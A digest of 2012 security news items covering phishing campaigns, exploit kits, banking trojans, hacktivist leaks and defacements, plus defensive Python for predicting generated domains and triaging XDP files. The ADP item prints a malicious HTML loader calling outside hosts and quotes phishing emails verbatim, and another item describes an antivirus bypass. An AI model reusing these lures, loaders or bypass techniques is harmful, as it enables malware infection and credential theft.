Emails with Subject "ADP Funding Notification – Debit Draft" lead to Exploits


Researchers at MX Lab have intercepted emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site serving obfuscated JavaScript code.


The email is sent from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:


Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services
The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>

</html>

Both embedded JavaScript files redirect the visitor with document.location='hxxp://173.255.228.171/getfile.php?u=853fda24'; the page at that address contains obfuscated JavaScript.

After de-obfuscating the JavaScript, I found the Blackhole exploit pack, which tries to exploit one of several vulnerable applications (Flash, PDF readers and others). At the bottom of the page is the applet code that targets the Java Atomic Reference vulnerability.


Zemra, a new Distributed Denial of Service (DDoS) crimeware bot


A Distributed Denial of Service (DDoS) crimeware bot known as "Zemra" has been identified by Symantec researchers. The threat has been observed performing denial-of-service attacks against organizations for the purpose of extortion.

Zemra first appeared on underground forums in May 2012 at a cost of €100($125).

This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that it has a command-and-control panel hosted on a remote server. The panel issues commands to compromised computers and acts as the gateway that records the number of infections and bots at the attacker's disposal.

Zemra uses 256-bit DES encryption/decryption for communication between server and client, and it can spread via USB devices.

Researchers revealed that the main functionality is the ability to perform a DDoS attack on a remote target computer of the user's choosing.


New version of Citadel Trojan prevents Virtual Machine Analysis


Security researchers from S21sec have spotted two major changes in the latest version of the Citadel Trojan. The two changes, an 'anti-emulator' and an 'encryption change', are meant to make malware analysts' lives harder.

The anti-emulator: when it starts, a built-in check determines whether it is running in a virtual machine or a sandboxed environment (CWSandbox, VMware, VirtualBox).

If it detects their presence, it starts to behave differently. Details were not disclosed, and the technique is very tricky.

According to the researchers, it simply scans through the resources of the currently running processes and looks for specific patterns, for instance inside the "CompanyName" field, such as 'vmware', 'sandbox', 'virtualbox' and 'geswall'.

While running in a VM, the Trojan creates a fake domain name and attempts to connect to it. This strategy is meant to fool researchers into believing that the command and control (C&C) server cannot be reached and that the bot is dead.

This is not the only change brought to Citadel. Experts have found that the RC4 implementation is slightly different compared to previous versions, with an internal hash added to the algorithm.

"Evil" Hacker sentenced to Two-and-a-half Years

The Australian hacker nicknamed “Evil” was sentenced to two-and-a-half years in prison, but could be released on parole in 12 months because he pleaded guilty, according to Police.

25-year-old David Noel Cecil had been arrested almost a year ago for hacking a National Broadband Network-linked service provider, changing and accessing restricted data. He was also accused of cyber-attacking Sydney University’s website, several Melbourne businesses, and companies overseas. Overall, Cecil was charged with 50 counts, but refused to be bailed.

Police ran a six-month investigation dubbed “Operation Damara”, and said the 25-year-old unemployed truck driver wanted to prove himself after failing to get into the IT sector.

“This person acted with an extreme and unusual level of malice and with no regard to the damage caused, indiscriminately targeting both individuals and companies,” National Manager Hi Tech Crime Operations Neil Gaughan said.

Feds said further charges will likely follow and others will also be arrested.

‘Confirm PayPal account' notifications lead to phishing sites


Extremely legitimate-looking PayPal-themed emails have been hitting inboxes in the last few days, trying to trick users into entering their account data on the fraudulent web site linked in the emails.

"Dear PayPal Costumer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website," the fake email reads.

"If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records before June 12, 2012. Once you have updated your account records, your PayPal account activity will not be interrupted and will continue as normal."

The offered link takes users to a faithfully reproduced PayPal phishing site.

And while the URL of the site (hxxp://lejesepofol.altervista.org/plaoyap/plaoyap/index.htm) might warn some users about its true nature, there are still too many who won't be bothered with checking it before entering their PayPal login credentials.

Panda Security site Hacked and database compromised by @LulzSecMx


A hacker known as @LulzSecMx claimed to have gained unauthorized access to the website of one of the biggest anti-virus providers, Panda Security, and leaked the database on Pastebin. The attack was announced via the @LulzSecMx Twitter account.

"pandasecurity.com, best known for its antivirus shit we have a message for you: D" Hacker said.

"We entered through the back door, they have earned money by working with police to be on the lookout and inform activists, your page as your antivirus is bullshit!"

The leak contains email addresses, encrypted passwords and other confidential data taken from the PandaSecurity.com website.

Anonymous Hackers attacked Japanese Govt. sites in Protest of Anti-Piracy Laws


The international hackers collective Anonymous has launched a series of cyber-attacks against Japanese government websites in protest at new stiffer penalties for illegal downloading that were passed in a copyright law amendment last week.

According to The Japan Times, the law was approved by the Education, Culture and Science Committee of the House of Councilors with 221 votes in favor.

After October 1, when the law goes into effect, users who download copyrighted content or copy DVDs may receive a fine of up to ¥2 million ($250,000 or 200,000 EUR) and can even be sentenced to a maximum of two years in prison.

Many fear that the way the bill is worded leaves a lot of room for interpretation, which could lead to a lot of unfair prosecutions.

In response to the news, Anonymous has released a statement that announces the start of an operation against the Japanese government.

“Earlier this week Japan approved an amendment to its copyright law which will give authorities the right to imprison citizens for up to two years simply for downloading copyrighted material,” Anonymous wrote.

“We at Anonymous believe strongly that this will result in scores of unnecessary prison sentences to numerous innocent citizens while doing little to solve the underlying problem of legitimate copyright infringement,” the hacktivists added.

“If this situation alone wasn’t horrible enough already, the content industry is now pushing ISPs in Japan to implement surveillance technology that will spy on and every single internet user in Japan. This would be an unprecedented approach and severely reduce the amount of privacy law abiding citizens should have in a free society.”

They concluded by launching a threat against the government and organizations that represent rights holders.

“To the government of Japan and the Recording Industry Association of Japan, you can now expect us the same way we have come to expect you in violating our basic rights to privacy and to an open internet.”

After the operation was announced, the finance ministry’s website was hacked, with messages opposing the stricter copyright laws posted on a number of its pages. The sites of the Supreme Court of Japan and the Intellectual Property High Court were also reported down overnight, while access to the sites of the two main political parties was said to be restricted.

Hook Analyser 2.0 released - reversing applications and analysing malware

Hook Analyser is a hooking tool that can be helpful in reversing applications and analysing malware.

Changelog:

  • Static analysis functionality has been improved significantly.
  • New fingerprinting feature (part of the static analysis module).
  • Analysis and logging modules have been improved.
  • No more annoying browser pop-ups (previous releases had some).
Download it from here:
http://beenuarora.com/HookAnalyser2.0.zip

Blackhole Exploit Kit upgraded to generate pseudo-random domains

Blackhole Exploit Kit is one of the best-known exploit kits used by cyber criminals to infect unsuspecting users through drive-by downloads. It delivers exploits for Java, Adobe Flash Player, Adobe Reader, Windows Help Center and other applications.

Although this approach has generally been very successful for malware authors, it has had one weakness. If the location or URL for the iframe, which actually contains the malicious code, changes or is taken down, all of the compromised sites will have to be updated to point to this new location. This process is difficult and impractical.

To deal with this, the Blackhole JavaScript code on compromised sites now dynamically generates pseudo-random domains, based on the date and other information, and then creates an iframe pointing to the generated domain.

After de-obfuscating the JavaScript in the compromised pages, Symantec researchers found the code that generates the pseudo-random domains.

This code uses the setTimeout() DOM function to run a particular piece of code (the anonymous function at the bottom of the code) after half a second. This function calls generatePseudoRandomString() with three arguments:

  • a timestamp
  • 16, the desired length of the domain name
  • ru, the top-level domain to use

The code then creates a hidden iframe, using the previously-generated domain as the source.

Once the domain has been generated and the iframe has been created, the exploit kit page runs many exploits as normal, going to great lengths to determine, for example, which compromised PDF file to show, depending on the version of Adobe Reader installed.

Running this code in isolation, it seems that the pseudo-random domain is based on a number which is in turn based on an initial seed value, the current month and the day of the current month. When running the code at the time of writing, it returned:

lfbovcaitd[REMOVED].ru

By changing the date passed to the function, we can determine the domains that will be used in future. All domains up to 7 August of this year have been registered and all currently resolve to the same IP address. The domains, all recently registered, use private registration, so the registrant's details are not published in WHOIS.
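The defensive pay-off of recovering a date-seeded generator is the step described in the last paragraph: run it for future dates and turn the output into a blocklist or sinkhole list before the domains go live. The following is an added example, not Symantec's code and not Blackhole's algorithm. The generator it contains is a hypothetical stand-in with the same inputs and output shape the text describes (a seed, the month and the day of the month, giving 16 lower-case letters under .ru); the real function would have to be transcribed from the de-obfuscated script. Only the enumeration and validation steps are the point.

```python
"""Pre-compute a blocklist from a recovered date-seeded DGA.

generate_pseudo_random_domain() is a constructed stand-in (LCG-based) with
the inputs the text describes: seed, month, day -> 16 letters + ".ru".
It is NOT Blackhole's generator; substitute the transcribed routine.
"""
import datetime

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def generate_pseudo_random_domain(seed, month, day, length=16, tld="ru"):
    """Hypothetical generator: identical inputs always give the same domain.

    Note the year is not an input, exactly as in the scheme described above,
    so the sequence repeats every year; a blocklist built from it stays valid
    only while the seed embedded in the injected script does not change.
    """
    state = (seed * 1000 + month * 100 + day) & 0xFFFFFFFF  # constructed mixing step
    letters = []
    for _ in range(length):
        state = (1103515245 * state + 12345) & 0x7FFFFFFF  # classic LCG step
        letters.append(ALPHABET[(state >> 16) % len(ALPHABET)])
    return "".join(letters) + "." + tld


def _as_date(value):
    """Accept a datetime.date or an ISO 'YYYY-MM-DD' string."""
    if isinstance(value, str):
        return datetime.date.fromisoformat(value)
    return value


def domains_for_range(seed, start, days, length=16, tld="ru"):
    """Map each date in [start, start + days) to the domain the DGA yields."""
    start = _as_date(start)
    result = {}
    for n in range(days):
        d = start + datetime.timedelta(days=n)
        result[d.isoformat()] = generate_pseudo_random_domain(
            seed, d.month, d.day, length, tld)
    return result


def blocklist(seed, start, days):
    """Unique, sorted domains for the window, ready for a DNS sinkhole or RPZ zone."""
    return sorted(set(domains_for_range(seed, start, days).values()))


def matches_observed(seed, date, observed_domain):
    """Sanity check before trusting the transcription: today's generated
    domain must equal a domain actually seen in traffic (the text's
    lfbovcaitd[REMOVED].ru); a transcription error yields zero overlap and
    a useless blocklist."""
    d = _as_date(date)
    return generate_pseudo_random_domain(seed, d.month, d.day) == observed_domain


if __name__ == "__main__":
    # Constructed seed; a real one comes from the de-obfuscated script.
    for day, dom in domains_for_range(7, "2012-06-26", 7).items():
        print(day, dom)
```

The `matches_observed` step is the one practitioners tend to skip: a DGA re-implementation that differs from the original by a single constant produces domains that look perfectly plausible and never appear on the wire, so always anchor the transcription against a domain captured from live traffic before registering or blocking anything.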

FBI two-year cybercrime sting leads to 24 arrests


The FBI orchestrated a two-year cybercrime sting that resulted in 24 arrests, with some alleged hackers facing more than 20 years in prison for allegedly profiting from stolen information such as credit card and bank account numbers, law enforcement authorities announced today.

The U.S. attorney's office in Manhattan and the FBI announced the arrests and provided details of the sting operation, which involved FBI agents posing as hackers while the bureau set up a fake "carding" forum, according to the press release (see the full release below).

Carding is the term for crimes associated with exploiting stolen personal information for profit. The forums helped "carders" communicate and, in some cases, find mailing addresses -- usually empty apartments or houses -- for products purchased with stolen credit-card data.

While the sting netted 24 arrests across eight countries, authorities only shared the charges of 12 alleged hackers. These individuals were charged with several counts of fraud, including selling personal data, using stolen information to purchase or obtain products, and selling tools to aid hackers in stealing information.

The FBI claims it prevented 400,000 potential cybercrimes via this operation.

via cnet

Airport of Sydney Hacked and Data Leaked by Zer0Pwn


The hacker known as 'Zer0Pwn' claimed to have gained unauthorized access to the Sydney Airport website (sydneyairport.com.au).

The hacker dumped the compromised data on Pastebin along with database details. The dump contains usernames and passwords (in plain text). The hacker also posted the admin login page details.

"We have gained access to the FIDS (Flight Information Display System) of your airport, and we are leaking the data. We're proving that literally, NOTHING is secure. " Hacker said in the leak.



University sites are being targeted by Team Dig7tal

The hacker group known as 'Team Dig7tal' has been breaking into university websites and leaking confidential data. They hacked into sites belonging to the University of Florida, Stanford University and the University of Nebraska.

The hacker leaked part of the database belonging to the University of Florida. "These databases have tens of thousands of entries each, so I only dumped a sample of the first DB," the hacker said.

Earlier this month, the University of Florida notified users that its database could have been compromised. The recent hack clearly indicates that the site is still vulnerable.

The hackers dumped the data belonging to the University of Nebraska - Lincoln on AnonPaste. "They failed to fix the SQL i vulnerability the first time, so it's a little worse this time. I'm hoping they'll take the time to fix it after this one. Probably not though...Anyway, let's get started." the hacker said.

The data leak contains username ,email address, hashed passwords, and other database details.

Security flaw in Kuwait Banking system, found by C0mrade

A hacker known as c0mrade has been trying to raise awareness of vulnerabilities in government sites. He claimed to have found a vulnerability in Kuwait’s banking system.

According to the hacker, the software vulnerability affects the Commercial Bank of Kuwait (CBK.com), NBK.com and other banking websites associated with Kuwait.

To prove the seriousness of the vulnerability, c0mrade has leaked a database containing the details of around 3,000 customers and transaction logs (credit card data censored).

"I am not a gutless Terrorist who prays for the Downfall of this Planet and the desire for it to become a Wasteland and all that comes left of it is Billions of bodies piled up onto each other, burnt remains and destroyed buildings. With that being said, I have a sudden thirst for epistemology. Let me elaborate, folks." Hacker said in the pastebin.

Biggest banking Trojan Botnet suspect arrested by Russian Authorities


Russian police authorities arrested a 22-year-old hacker who is allegedly responsible for compromising more than 4.5 million computers – making it the largest publicly known botnet to date.

According to Russia’s Interior Ministry, the hacker used banking trojans to steal 150 million roubles($4.5 million or 3.6 million EUR), from private individuals and organisations.

The young man was known as "Hermes" and "Arashi" in online communities and apparently used variants of Carberp and similar trojans to commit the crimes. The trojan stole users' access credentials and used them to transfer money to bogus companies. Helpers then withdrew the stolen money from cash points. Most of the victims were Russian nationals.

This is the biggest banking Trojan botnet ever to be uncovered in Russia, according to reports, and one of the biggest in the world. Every day, the botnet operator would attempt to install malware on around 1 million computers, which meant that on some days, around 100,000 computers would join the network.

The authorities say that the arrest of "Hermes" and other members of his hacker group was carried out with the assistance of anti-virus company Dr. Web. Most of the accomplices lived in Moscow and St. Petersburg while "Hermes" was arrested in Southern Russia according to the reports.


Iranian Central Bank hit by DDOS attack

The Central Bank of Iran was hit with a cyber attack on Tuesday which brought down the bank’s internet connection, according to the Iranian Labour News Agency (ILNA).

An analyst quoted by the news service said the attack brought down the CBI’s website and that the “internal network’s going offline for an extended period is a sign there was a cyber-attack against the Central Bank of Iran.”

The attack occurred the same day in which negotiations in Moscow over Iran’s nuclear program failed to produce any positive results. European Union foreign affairs chief Catherine Ashton told reporters there are “significant gaps” between the positions of Iran and world powers when it comes to an agreement on Iran’s nuclear ambitions.

Heydar Moslehi, the intelligence minister for Iran, said on Thursday that cyber attacks against the Islamic Republic have increased since the meetings in Moscow ended.

On Wednesday, websites associated with the highest levels of Israeli government were unavailable as well. This came one day after the Washington Post published a story that Israel and the United States worked on a computer virus named “Flame”, in order to collect information inside Iran as a prelude to cyber-attacks aimed at slowing the Iranian nuclear program.

Source: The Algemeiner

NT OBJECTives Releases New NTOEnterprise for Web Application Vulnerability Program Management

NT OBJECTives, a provider of automated, comprehensive and accurate web application security software, services and SaaS, today announced the availability of NTOEnterprise 2.0 which enables organizations to plan, manage, control and measure thousands of web application scans and also assess and prioritize areas of greatest risk across the enterprise.



“With NTOEnterprise, security teams, developers and CSOs can quickly view and easily understand how their organization’s security is improving, or not, and more importantly, what they can do about it. They can prioritize threats and respond more rapidly to their key areas of vulnerability,” says Dan Kuykendall, CTO and co-founder of NT OBJECTives. “With our customers’ input, we were also able to design an incredibly useful customizable report and graphic generation engine in the new version as well.”



NTOEnterprise features a consolidated graphical view of the enterprise security posture across all enterprise applications, allowing security professionals to easily determine vulnerability and application behavior trends, along with the overall status of the application security program. The new version includes data tagging capabilities that enable security teams to view applications by any user-defined criteria such as business unit, business risk, criticality, owner, location or any other grouping that can help security professionals organize applications. Security professionals now also have the ability to quickly navigate scan plans and configurations through flexible search functionality based on domain names, scan times and custom tagging.



NTOEnterprise enables customers to:
  •  Scale application security programs to handle simultaneous scans
  •  Centralize management and control of scan configurations, schedules and permissions
  •  Share information beyond security teams to developers, QA teams and executives
  •  Demonstrate compliance with regulatory and organizational security policies


NTOEnterprise 2.0 enhancements include:


Centralized Management Console
The new centralized dashboard provides a consolidated view of web application scans that includes:

  • Active vulnerabilities by vulnerability type
  • Six month vulnerability trending chart
  • Recently completed scans
  • Scans in progress



Enterprise Scan Management
The enhanced user interface improves users’ ability to initiate, schedule and configure application scans. The consolidated interface enables users to quickly view in-progress, recent and scheduled scans. Scans can be scheduled to run at regular monthly or quarterly intervals to provide ongoing monitoring of application security issues.


Blackout Management
Users have an improved ability to define when scans can't happen and when they can with improved blackout functionality. Only administrators can define blackout periods and the defined blackouts trump scheduled scanning so users can feel confident that business operations won’t be impacted.


Asset Tagging
New asset tags facilitate flexible custom reporting and a graphical view of the security posture across all enterprise applications. Organizations can define (customize) their own tags to view applications and vulnerabilities from different vantage points. Organizations can tag by location, team or business functionality such as which applications store credit card data or Personally Identifiable Information (PII). In addition, organizations can define trending data to show vulnerability trends over time.


Custom & Graphical Report Generation
New custom report generators allow users to define filters to quickly find and analyze vulnerability information from their scans. The custom reports and charts provide fantastic presentation data for management.


Test Management Software Integration
NTOEnterprise is now capable of creating tickets for each discovered vulnerability in popular issue management systems. Supported systems: RSA Archer, HP Quality Center and Atlassian's JIRA.

Infrastructure & Performance
NTOEnterprise’s back-end infrastructure has been enhanced to optimize user experience and performance. The new installation model enables organizations to implement tighter security controls to each component.


For more information visit http://www.ntobjectives.com/security-software/ntoenterprise-centralized-application-security


About NT OBJECTives

NT OBJECTives, Inc. has been dedicated to solving the most difficult application security challenges for over 10 years. NTO’s software, SaaS and services solutions are designed to help organizations build the most comprehensive, efficient, accurate web application security program. NTO’s SaaS offering, NTOSpider On-Demand, can be augmented with enhanced services including false positive validation and business logic testing. NT OBJECTIVES is privately held with headquarters in Irvine, CA.


Famous Porn Network Hacked By 3xp1r3 Cyber Army



The Bangladeshi Hackers group known as 3xp1r3 Cyber Army hacked famous porn websites and defaced them.

The list of hacked sites is:
  • http://freehardcoreporn.xxx/
  • http://freecelebritysextapes.xxx/
  • http://findafuck.xxx/
  • http://celebritypornmovies.xxx/
  • http://redhotvoucher.com/
  • http://aienetwork.com/
  • http://xlmedianetworks.com/
  • http://aien.xxx/

At the time of writing this article, the sites had not been restored and the defacement was still visible.

The mirrors for the defaced pages:
http://zone-hack.com/mirror/id/62923
http://zone-hack.com/mirror/id/62924
http://zone-hack.com/mirror/id/62925
http://zone-hack.com/mirror/id/62926
http://zone-hack.com/mirror/id/62927
http://zone-hack.com/mirror/id/62928
http://zone-hack.com/mirror/id/62929
http://zone-hack.com/mirror/id/62930

Cyber-war: more Bangladesh Government sites hacked by Myanmar Hackers

After the Bangladesh Cyber Army declared cyber-war on Myanmar and hacked a few government sites, the Myanmar hacker group known as 'Blink Hacker Group (BCH)' hacked more Bangladeshi government sites.

The hacked sites are the Bangladesh Public Service Commission (BPSC), Information and Communication Technology Division, Cabinet Division, Pabna Textile Engineering College, Ministry of Defence, NID Registration Wing and Bangladesh National Commission for UNESCO.

The Disaster Management Bureau (DMB), Department of Textile, Economic Relations Division (ERD), Bangladesh Election Commission, Ministry of Communication, Ministry of Civil Aviation and Tourism and more sites also fell victim to this cyber attack from Myanmar hackers.

The hackers provided us with the list of hacked sites. You can find the list here:
http://pastebin.com/raw.php?i=jnqXLNX1.


The hackers wiped out the databases of the hacked sites. At the time of writing this article, all sites appeared to be suffering database connection issues.

Bluebox Launches with $9.5 Million Funding Led by Andreessen Horowitz / Andreas Bechtolsheim Joins Board

Bluebox, a start-up developing the next evolution in enterprise security technology, announced today that it has closed a $9.5 million Series A financing round led by Andreessen Horowitz.

Additional investors include Andreas Bechtolsheim, co-founder of Sun Microsystems and one of the first investors in Google, SV Angel, Ram Shriram, board member of Google and one of its first investors, and Brian Cohen, former CEO of SPI Dynamics (acquired by HP). Along with the initial round of funding, Bechtolsheim and Scott Weiss, general partner at Andreessen Horowitz, have been named to the company’s board of directors.

Bluebox is founded by veteran entrepreneurs with strong security DNA. Bluebox CEO and co-founder Caleb Sima served as Chief Technology Officer for HP’s Application Security Center and was responsible for directing the lifecycle of the company’s web application security solutions. He joined HP following the acquisition in 2007 of SPI Dynamics, the company he co-founded and led as CTO, where he oversaw the development of WebInspect - a solution that set the bar in Web application security testing tools. Prior to co-founding SPI Dynamics in early 2000, Caleb worked for Internet Security Systems’ elite X-Force R&D team and as a Security Engineer for S1 Corporation.

Co-founder Adam Ely was previously CISO of the Heroku business unit at salesforce.com. Prior to salesforce.com, Adam led security operations, application security, and compliance for TiVo. Before TiVo, he led security functions within The Walt Disney Company, responsible for properties including ABC.com, ESPN.com, and Disney.com.

“Enterprise security on mobile is an unsolved problem, and, frankly, is in need of innovation,” said Bechtolsheim. “Bluebox is developing a solution that will change the way enterprises think of how to successfully and seamlessly protect their data.”

"This is the most amazing security team that I've seen in a long time," said Scott Weiss, general partner at Andreessen Horowitz and former CEO of IronPort Systems, which was acquired by Cisco. "They are going after one of the hardest problems that companies face and where incumbents have floundered."


Bluebox is hiring world-class developers, who want to work on breakthrough security technology. Interested individuals should contact the company rockstars@bluebox.com. Visit www.bluebox.com to learn more, or follow us on Twitter @BlueboxSec.


New ZitMo Trojan masquerades as Android Security Suit Premium

Android users looking for a good antivirus should beware of this latest threat, which masquerades as an "Android Security Suite Premium" application. Kaspersky recently came across 6 APK files whose functionality is almost the same as in old ZitMo samples.

ZitMo (short for Zeus-in-the-mobile) is the mobile component of the Zeus banking malware. The malware steals incoming SMS messages and sends them to command-and-control (C&C) servers operated by the attackers.

After further analysis of the new variant, researchers found that its C&C servers are somehow connected to domains that show up in their ZeuS C&C database.

"So, there is new piece of Android malware which steals incoming SMS messages and uploads them to the remote server," Denis Maslennikov, a Kaspersky Lab expert said.

"The newest variant of ZitMo demonstrates the commitment to effective mobile spyware development and distribution that cybercrime has made," Kurt Baumgartner, senior security researcher at Kaspersky Lab told to ComputerWorld.

As usual, users are advised to install Android apps only from the official Google Play website and should always look at an app's reviews and download statistics to determine whether it is trustworthy.

Cyber War between Myanmar Hackers and Bangladeshi Cyber Army


A Bangladeshi hackers group known as 'Bangladeshi Cyber Army(BCA)' has declared a cyber-war on Myanmar, accusing the country of killing innocent Muslims and its hackers of breaching Bangladeshi websites.

"This injustice over the Muslims and attack on the Bangladeshi cyber space has forced us to react. In this situation, we feel the necessity of a cyber war, against racists." the hackers posted on their official Facebook page.

"Human Rights Commission and other Governments who have the ability to stop all these are sitting idle under this situation. We request them to come forward and stand against injustice."

As part of the cyber war, the BCA took down a number of Myanmar government sites by DDoS attack. The sites of the Ministry of Foreign Affairs (www.myanmar.gov.mm), Ministry of Co-operatives (www.myancoop.gov.mm), Ministry of Construction (www.construction.gov.mm), Ministry of Forestry (www.myanmarteak.gov.mm) and Ministry of Agriculture and Irrigation (www.moai.gov.mm) appeared to be down at the time of writing this article.


Hackers also defaced the websites of Myanmar Tour And Travel, the University of Medicine in Mandalay, Myanmar Logistics Co, Client Focus Technology Group, UN Framework Convention on Climate Change, The Royal Hantha Arts of Myanmar Artists, Myanmar Clover Hotel Yangon, and others.

As part of the Cyber-war, Myanmar hackers also started to hack more Bangladeshi sites. More than 30 Bangladeshi government sites were defaced. The sites are Ministry of Education, Department of Relief & Rehabilitation,Ministry Of Industries and others. The full list of hacked sites can be found here.

CVE-2012-1875 : Exploit for Remote Code Execution Flaw in Internet Explorer 8


Less than a week after Microsoft released a security advisory detailing a number of critical vulnerabilities in Internet Explorer, exploit code has been made available for the CVE-2012-1875 remote code execution flaw.

CVE-2012-1875: Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

While releasing the security advisory, Microsoft also issued a warning that working exploit code could be released within 30 days. As usual, it doesn’t take much time for such popular attack codes to become available.

Also, this is not the only vulnerability that affects Internet Explorer. There’s another critical flaw in Microsoft XML Core Services that hasn’t been patched yet, but for which the Redmond company released a temporary fix.

The Metasploit exploit framework has been fitted with a module that takes advantage of the vulnerability, meaning that the attack option is freely available to anyone who knows how to use the framework.


AV Bypass for Malicious PDFs Using XML Data Package (XDP) format

Security researcher Brandon Dixon has discovered a way to bypass antivirus detection of malicious PDFs using the XML Data Package (XDP) format.

XDP is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.

Because Adobe Reader opens XDP files just as it would a normal PDF, opening a malicious XDP file can trigger an Adobe Reader exploit.

Dixon's test document, which uses a two-year-old security vulnerability in Adobe Reader, was only detected by one anti-virus package in his tests. After experimenting with the XDP format, he was able to create another file that fooled all 42 anti-virus engines used on VirusTotal.

"The exploit is old. The JS is not encoded. This should be fixed. If you are wondering how to combat against this on your network or in your inbox, then look for XDP files," Dixon said in his blog.

"Of course, one could simply change the extension and still trick the user, but only awareness can fix that. For those with DPI, look for the Adobe XDP namespace and base64 code to identify the PDF embedded inside."
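Dixon's detection advice (look for the XDP namespace and the base64 blob, not the file extension) turned into a small content-based triage script. This is an added example, not Dixon's code; the <pdf>/<chunk> wrapper layout and its namespace are assumptions about the XDP format, and the sample PDF and XDP container are constructed inline.

```python
"""Content-based triage of Adobe XDP files (added example, not Dixon's code).

Detection keys on the Adobe XDP namespace and the base64 <chunk> payload,
so renaming the file (.xdp -> .pdf or anything else) does not hide it.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import Optional

XDP_NS = "http://ns.adobe.com/xdp/"      # the namespace the text tells defenders to look for
PDF_NS = "http://ns.adobe.com/xdp/pdf/"  # assumed namespace of the <pdf> wrapper element

# PDF features that commonly appear in exploit documents (constructed watch list)
RISKY_MARKERS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/Launch", b"/EmbeddedFile"]


def extract_pdf(data: bytes) -> Optional[bytes]:
    """Return the PDF embedded in an XDP container, or None if `data` is not
    XDP or carries no decodable base64 chunk.
    (For untrusted samples in production, parse with defusedxml instead of
    the stdlib parser.)"""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return None
    if root.tag != "{%s}xdp" % XDP_NS:
        return None
    # <chunk> elements hold the base64 payload; accept any namespace on them
    chunks = [el.text or "" for el in root.iter() if el.tag.rsplit("}", 1)[-1] == "chunk"]
    if not chunks:
        return None
    b64 = re.sub(r"\s+", "", "".join(chunks))  # base64 is usually line-wrapped
    try:
        return base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage(data: bytes) -> dict:
    """Summarise what a mail gateway or DPI rule would want to know."""
    pdf = extract_pdf(data)
    if pdf is None:
        return {"is_xdp_with_pdf": False, "valid_pdf_header": False, "markers": []}
    return {
        "is_xdp_with_pdf": True,
        "valid_pdf_header": pdf.startswith(b"%PDF-"),
        "markers": sorted(m.decode() for m in RISKY_MARKERS if m in pdf),
    }


def wrap_in_xdp(pdf: bytes) -> bytes:
    """Build a constructed XDP container around a PDF, with the base64 split
    across lines the way a real file would be, to exercise the extractor."""
    b64 = base64.b64encode(pdf).decode()
    lines = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<xdp:xdp xmlns:xdp="{XDP_NS}">\n'
        f'  <pdf xmlns="{PDF_NS}"><document><chunk>\n{lines}\n</chunk></document></pdf>\n'
        '</xdp:xdp>\n'
    ).encode()


# Constructed minimal PDF whose OpenAction runs unencoded JavaScript: the
# shape of the "old exploit, JS not encoded" sample, with harmless content.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 3 0 R /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (app.alert('constructed sample')) >> endobj\n"
    b"3 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    print(triage(wrap_in_xdp(SAMPLE_PDF)))  # XDP carrying a JS-bearing PDF
    print(triage(SAMPLE_PDF))               # a bare PDF is not an XDP container
```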

Ghost, a honeypot for capturing USB malware

The Honeypot project has released the first public version of a malware honeypot called "Ghost".

Ghost is a honeypot for USB malware. It is capable of capturing malware that propagates via USB storage devices without any further knowledge. This is done by emulating a USB thumb drive and tricking malware into infecting the emulated device. Because a machine must be infected for the virtual device to detect the malware, the honeypot is designed to run on Windows systems, which are the main target of malware at the moment.

Currently, Ghost only supports Windows XP and is in an early development stage, although its concept has been shown to work well, and the code is stable. If Ghost detects an infection, then it will currently only report that the machine is possibly infected, without including any additional information.

The team plans to extend Ghost's reporting capabilities and to make it run on other versions of Windows. We can expect the complete product on August 31. The source code and binaries can be found here.

Google's MarkMonitor account hacked by #UGNazi via Social Engineering


The well-known hacker group UGNazi claimed to have gained access to Google's MarkMonitor account. According to their press release, the hackers managed to reset the account via a social engineering attack.

"The agent that helped us reset the account should get somewhat of credit, she helped us a lot on resetting Google's MarkMonitor account," the hacker said in the press release.

"3 Days ago, We gained access into Google's registrar MarkMonitor, the following picture goes to show how no one is safe http://i.imgur.com/KDWja.png," reads the tweet from the hackers' account.

"i suggest you move to a more secure registrar. but then again, we are Social Engineering Gods." The statement clearly shows the group is strong in social engineering attacks. Earlier this month, the group hacked WHMCS via a social engineering attack.

"So, this just goes to show, even Google can be Social Engineered. P.S. It was Google's Account Manager, Olga Was, so technically, we did Social Engineer Google. :)," the hacker said.

At the time of writing, there is no official statement from Google or MarkMonitor about the hack.


AVG Family Safety web browser: Keep your family safe online


AVG has launched the iOS and Windows Phone versions of its Family Safety web browser to ensure that adults and their children are protected from online threats such as scams, phishing and potentially dangerous websites.

“With people increasingly using mobile devices to access social networks and browse the web, protecting these devices against online threats has become vital,” said JR Smith, CEO of AVG Technologies.

